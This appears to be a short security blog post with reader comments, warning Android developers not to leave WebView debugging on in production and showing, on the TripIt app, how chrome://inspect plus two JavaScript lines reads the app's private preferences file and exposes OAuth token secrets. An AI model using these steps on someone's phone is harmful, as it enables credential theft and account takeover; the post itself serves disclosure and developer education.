Android Security: Don’t leave WebView debugging enabled in production

WebView debugging can be enabled via “WebView.setWebContentsDebuggingEnabled(true)”. Leaving WebView debugging enabled in production Android apps is a bad idea. Anyone who gets hold of the unlocked phone can access the app’s data forever.

Consider this, the Tripit app exposes WebView debugging, and by using that I can read all the files inside the private data directory. As an example, by connecting a user’s unlocked mobile phone to my laptop, I can extract TripIt OAuthToken.

First, connect the phone via ADB, open chrome://inspect in the Chrome browser, click “inspect” below “com.tripit” and enter the following in there.

window.location="file:///data/data/com.tripit/shared_prefs/com.tripit.xml"
document.getElementsByTagName("html")[0].innerHTML

Now, you can see all the entries like

<string name=”oauthTokenSecret”>f731d36cdbf9006f917307…</string>

These auth tokens can be copied and used to get permanent access to the user’s TripIt account.

4 Replies to “Android Security: Don’t leave WebView debugging enabled in production”

  1. Hey Where I Have to Put This Code

  2. Updated the blog post with more details “First, connect the phone via ADB, open chrome://inspect in the Chrome browser, click “inspect” below “com.tripit” and enter the following in there.”

  3. What’s the impact if we leave the code there and set the value to 0(false)?

  4. Yeah, `false` is fine there.

Leave a Reply

Your email address will not be published. Required fields are marked *